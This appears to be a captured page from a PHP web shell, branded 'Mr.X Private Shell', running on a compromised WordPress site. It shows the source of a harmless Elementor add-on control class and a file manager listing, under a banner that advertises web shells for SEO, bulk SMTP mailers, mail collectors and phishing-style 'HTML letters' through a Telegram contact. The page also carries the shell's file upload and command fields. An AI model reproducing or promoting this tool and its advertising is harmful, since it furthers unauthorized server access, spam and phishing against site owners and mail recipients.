__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace MasterAddons\Inc\Controls;

use \Elementor\Control_Select2;

if (!defined('ABSPATH')) {
	exit;
};

class JLTMA_Control_Query extends Control_Select2
{

	public function get_type()
	{
		return 'jltma_query';
	}

	public function enqueue()
	{
		// wp_enqueue_script( 'jltma-macy', JLTMA_URL . '/assets/vendor/macy/macy.js', ['jquery'], JLTMA_VER, true );
		wp_enqueue_script('master-addons-editor', JLTMA_ADMIN_ASSETS . 'js/editor.js', ['jquery'], JLTMA_VER, true);
	}

	protected function get_default_settings()
	{
		return array_merge(parent::get_default_settings(), ['query' => '']);
	}

	public function get_default_value()
	{
		return parent::get_default_value();
	}
}

Filemanager

Name Type Size Permission Actions
group Folder 0775
choose-text.php File 2.58 KB 0775
file-select.php File 2.18 KB 0775
jltma-query.php File 689 B 0775
visual-select.php File 2.61 KB 0775
Filemanager